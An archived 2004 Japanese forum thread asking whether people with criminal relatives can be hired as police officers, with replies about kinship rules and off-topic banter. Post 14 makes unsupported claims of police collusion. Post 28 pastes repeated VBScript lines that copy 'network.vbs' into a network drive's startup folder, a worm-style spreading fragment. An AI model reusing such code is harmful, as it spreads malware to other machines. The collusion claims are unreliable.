5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

身内に犯罪者がいるのに警察官になれた人あちまれ!

1 :名無しピーポ君:04/06/01 13:51
頼む
そんなやつがいたら書き込んでくれ

犯罪って言っても程度があるから一概にはいえんが・・

2 :肛門マンヽ(`*´)ノ ◆UWAAAAAA.. :04/06/01 14:01
軽やかに2げと

3 :名無しピーポ君:04/06/01 14:03
追記
犯罪者っていっても前科とか、ずーっと昔に犯罪して前科もちの状態の身内がいるとか
そういうのも含む

4 :名無しピーポ君:04/06/01 14:11
まぁ 身内を恨むんだな

5 :名無しピーポ君:04/06/01 15:37
また宅間巡査がクソスレ立てたな!いいかげんに汁

6 :名無しピーポ君:04/06/01 16:52
身内に犯罪者がいないのに警察官になれなかった人あちまれ!

7 :名無しピーポ君:04/06/01 17:35
自分も興味があるのでage

8 :名無しピーポ君:04/06/01 17:55
1あっぱれだ

9 :名無しピーポ君:04/06/01 18:53
いとこが放火犯でもなれた

調査対象だからな

10 ::04/06/01 18:54
失礼!
調査対象外だからな

11 :名無しピーポ君:04/06/01 21:33
嫁の父の兄の息子が少年院行ったり 破産宣告してるが 平気?〉秋田県警機動隊

12 :名無しピーポ君:04/06/01 21:39
>>11
いつもなら煽るとこだが、同郷のよしみでマジレスしてやる。
県警の採用試験は、三親等でないから平気だろ。

警備(機動隊も含む)に逝けるかは知らんが。

13 :名無しピーポ君:04/06/01 21:55
ありがとうございます。県によって採用基準が違うのですね? でも彼は一生 うだつ上がらないですよね?

14 :ぴんきー ◆jXYv22QnD. :04/06/01 22:39
身内に犯罪者より現職の不正行為の方が問題だろ。
俺の場合、埼玉県警、群馬県警、北海道警察、大分県警と連携して
不正をやってくる。
簡単に説明すると、

財産をぶんどろうとたくらむ → 自分達の身内を結婚させる

→ 親戚一同で押しかけて乗っ取り

ってな事をたくらむ連中がいるわけ。
こっちは、そんなの見抜いているから相手にしないのだが
しつこくいろいろ吹っかけてくるわけだ。
で、こちらは警察に相談する。するとシッカリ向こう側とつながっていて
こちらのことはスルー。で、向こう側には協力と。

15 :名無しピーポ君:04/06/01 22:43
>>12
>県によって採用基準が違うのですね?

三親等内に犯罪歴のある人間がいればアウトなのは全国共通だろ。
12の「県警の採用試験は、三親等でないから平気だろ」は「試験には関係ないだろ」って意味。

うだつ上がらんかどうかはそいつの能力次第だろ。

でも、まぁ、家庭に問題を抱えてると、色々面倒なことは事実だが。

16 :名無しピーポ君:04/06/01 22:49
>>14
>身内に犯罪者より現職の不正行為の方が問題だろ。

おまえに分かる言葉で説明すると、こういうのを「スレ違い」と言う。
スレタイと>>1を良く嫁。

17 :名無しピーポ君:04/06/01 23:37
レスありがとうございます。本人が 頑張ったからって、簡単に出世できる世界ではありませんよね? しかし三等親に犯罪者がいるのに何故採用?少年事件は関係ない?

18 :名無しピーポ君:04/06/01 23:41
>>17
>本人が 頑張ったからって、簡単に出世できる世界ではありませんよね?

頑張りの度合いにもよるが、色々頑張れば出世できる世界だぞ。
「色々」がポイントだが。

>三等親に犯罪者がいるのに何故採用?少年事件は関係ない?

職に就いてから子供を持つのが普通だろう?
警官になって生まれた子供がグレたんじゃないのか?

19 :名無しピーポ君:04/06/02 00:21
ごめんなさい。書き方が悪くて。嫁のいとこ(父の兄の息子)です、嫁とはほぼ 同学年で少年時代から少年院繰り返し 。成年時に罰金刑。で、結婚前です。

20 :名無しピーポ君:04/06/02 00:37
>>19
もうわけが分からん。

日本語を勉強せい。

21 :名無しピーポ君:04/06/02 02:49
はあーすいません。
要するに、警官の妻の父親の兄の子が 少年院出たり入ったりで、成人でも 罰金刑を受けている身内がいます。その事件は 警官との婚約前から現在にいたります。それでも結婚したので、調べたりしなかったんですか?彼は平気ですか?って事です。

22 :名無しピーポ君:04/06/02 11:57

意味不明

23 :名無しピーポ君:04/06/02 12:18
               /\             /\
               // \           // \
              //   \         //   \
             /∠___ \____∠∠___ \
            /                        \
           /           ジ ェ ン          |
          /     / ̄ ゚̄ ̄ ̄\   / ̄ ゚̄ ̄ ̄\ |
         |:       ̄ ̄ ̄ ̄ ̄ ̄    ̄ ̄ ̄ ̄ ̄ ̄  |
         |::       _               _   |
         |::::      | \            /|  |     
         |:::::::     | \             //   |     
         |:::::::        \_______/     |         
         |:::::::::         \        /      |       
          \::::::::         \      /       /   

24 :名無しピーポ君:04/06/02 12:57
既に警察になってる人が、親戚に犯罪者をもつ奥さんと何故結婚したか?って事を聞きたいのかな??

25 :名無しピーポ君:04/06/03 02:01
24さん 御理解いただきありがとうございます
私の兄なので ちょっと心配しました。

26 :名無しピーポ君:04/06/03 11:41
こいつが身内でも警察官になれるのか
http://zip.2chan.net/7/src/1086217453155.jpg

27 :名無しピーポ君:04/06/03 11:46
>>26
おまえ、多スレにウゼーよ

28 :名無しピーポ君:04/06/03 12:48
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"

7 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)